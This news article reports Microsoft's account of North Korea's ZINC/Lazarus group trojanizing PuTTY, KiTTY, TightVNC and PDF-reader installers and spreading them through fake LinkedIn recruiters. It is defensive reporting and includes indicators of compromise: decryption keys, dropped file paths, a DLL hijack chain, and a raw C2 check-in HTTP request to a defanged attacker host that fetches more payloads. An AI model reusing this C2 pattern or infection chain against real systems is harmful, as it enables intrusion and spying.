Getty Images
Hackers backed by the North Korean government are weaponizing known pieces of open-source software in an ongoing campaign that has already succeeded in compromising “numerous” media, defense and aerospace and IT services organizations, Microsoft said Thursday.
ZINC—Microsoft’s name for a threat actor group also called Lazarus, best known for carrying out the devastating 2014 compromise of Sony Pictures Entertainment—has laced PuTTY and other legitimate open source applications with highly encrypted code that ultimately installs spyware malware.
The hackers then pose as job recruiters and connect with individuals from targeted organizations over LinkedIn. After developing a level of trust over a series of conversations and eventually moving them to the WhatsApp messenger, the hackers instruct the individuals to install the apps, which infect the employees’ work environments.
Microsoft
“The actors have successfully compromised a number of organizations since June 2022,” members of Microsoft Security Threat Intelligence and LinkedIn Threat Prevention and Defense wrote in a post. “Due to the broad use of the platforms and software used by ZINC in this campaign, ZINC may pose a significant threat to individuals and organizations across multiple sectors and regions.”
PuTTY is a popular terminal emulator, serial console, and network file transfer application that supports network protocols including SSH, SCP, Telnet, rlogin, and raw socket connection. Two weeks ago, security firm Mandiant warned that hackers with ties to North Korea had trojaned it in a campaign that successfully compromised a customer’s network. Thursday’s post said the same hackers have also weaponized KiTTY, TightVNC, Sumatra PDF Reader and muPDF/Subliminal Recording software with code that installs the same spyware malware, which Microsoft has dubbed ZetaNile.
Lazarus was once a bunch of hackers with only marginal resources and skills. Over the past decade, its prowess has grown considerably. The attacks on cryptocurrency exchanges over the past five years have generated billions of dollars for the country’s WMD programs. They regularly find and exploit zero-day vulnerabilities in heavily fortified apps and use many of the same malware techniques used by other state-sponsored groups.
The group primarily relies on spear phishing as the initial vector to victims, but they also use other forms of social engineering and website compromises at times. A common theme is that members target employees of organizations they wish to compromise, often by tricking or forcing them to install trojanized software.
The trojanized PuTTY and KiTTY apps Microsoft has observed use a clever mechanism to ensure that only intended targets are infected and that it does not inadvertently infect others. The app installers do not run any malicious code. Instead, the ZetaNile malware is installed only when the apps connect to a specific IP address and use credentials that fake recruiters provide to targets.
The Trojanized PuTTY executable uses a technique called DLL search command hijacking, which loads and decrypts a second-stage payload when presented with the key “0CE1241A44557AA438F27BC6D4ACA246” for use as command and control. Once connected to the C2 server, the attackers can install additional malware on the compromised device. The KiTTY app works the same way.
Like KiTTY and PuTTY, the malicious TightVNC Viewer installs its final payload only when a user selects ec2-aet-tech.w-ada[.]amazonaws from the pre-populated remote hosts drop-down menu in the TightVNC Viewer.
Microsoft
Thursday’s post continued:
The trojanized version of Sumatra PDF Reader called SecurePDF.exe has been used by ZINC since at least 2019 and remains a unique ZINC craft. SecurePDF.exe is a modularized loader that can install the ZetaNile implant by loading a weapon-based job application theme file with a .PDF extension. The fake PDF contains a header “SPV005”, a decryption key, encrypted second-stage implant payload, and encrypted decoy PDF, which renders in Sumatra PDF Reader when the file is opened.
Once loaded into memory, the second stage malware is configured to send the victim’s system hostname and device information using custom encoding algorithms to a C2 communications server as part of the C2 check-in process. The attackers can install additional malware on the compromised devices using C2 communication as needed.
Microsoft
The post continued:
In the trojanized version of the muPDF/Subliminal Recording installer, setup.exe is configured to recheck the file path ISSetupPrerequisites\Setup64.exe exists and writes C:\colrctl\colorui.dll on disk after extracting the embedded executable inside setup.exe. It then copies C:\Windows\System32\ColorCpl.exe to C:\ColorCtrl\ColorCpl.exe. For second stage malware, the malicious installer creates a new process C:\colorctrl\colorcpl.exe C3A9B30B6A313F289297C9A36730DB6Dand the argumentation C3A9B30B6A313F289297C9A36730DB6D is transferred to colorui.dll as a decryption key. DLL colorui.dll, which Microsoft tracks as the EventHorizon malware family, is injected into C:\Windows\System\credwiz.exe or iexpress.exe to send C2 HTTP requests as part of the victim’s check-in process and to obtain an additional payload.
POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]combbs=[encrypted payload]= &article=[encrypted payload]
The post provides technical indicators that organizations can look for to determine if any endpoints on their networks are infected. It also includes IP addresses used in the campaign that administrators can add to their network block lists.
